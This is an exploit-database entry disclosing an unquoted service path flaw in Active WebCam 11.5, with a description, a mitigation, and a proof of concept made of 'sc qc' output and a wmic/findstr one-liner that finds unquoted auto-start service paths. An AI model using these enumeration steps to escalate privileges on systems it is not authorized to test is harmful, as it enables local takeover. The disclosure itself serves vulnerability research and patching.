header-logo
Suggest Exploit
vendor:
Active WebCam
by:
Salman Asad (LeoBreaker)
7,8
CVSS
HIGH
Unquoted Service Path
73
CWE
Product Name: Active WebCam
Affected Version From: 11.5
Affected Version To: 11.5
Patch Exists: NO
Related CWE: N/A
CPE: a:pysoft:active_webcam:11.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10
2021

Active WebCam 11.5 – Unquoted Service Path

Active WebCam 11.5 is vulnerable to Unquoted Service Path vulnerability. The service is configured to start automatically on Windows startup with 'Start as Service' option enabled in Program Options. The service is running with LocalSystem privileges and the binary path is not quoted, which can be exploited by an attacker to gain elevated privileges.

Mitigation:

Ensure that all service paths are quoted and that all services are running with least privileges.
Source

Exploit-DB raw data:

# Exploit Title: Active WebCam 11.5 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 09.09.2021
# Software Link: https://www.techspot.com/downloads/175-active-webcam.html
# Vendor Homepage: https://www.pysoft.com/
# Version: 11.5
# Tested on: Windows 10

# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options

# Proof of Concept:

C:\Users\death>sc qc ACTIVEWEBCAM
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACTIVEWEBCAM
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Active WebCam\WebCam.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Active WebCam
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Active WebCam           ACTIVEWEBCAM            C:\Program Files\Active WebCam\WebCam.exe               Auto

Navigation

Suggest Exploit

Services By CQR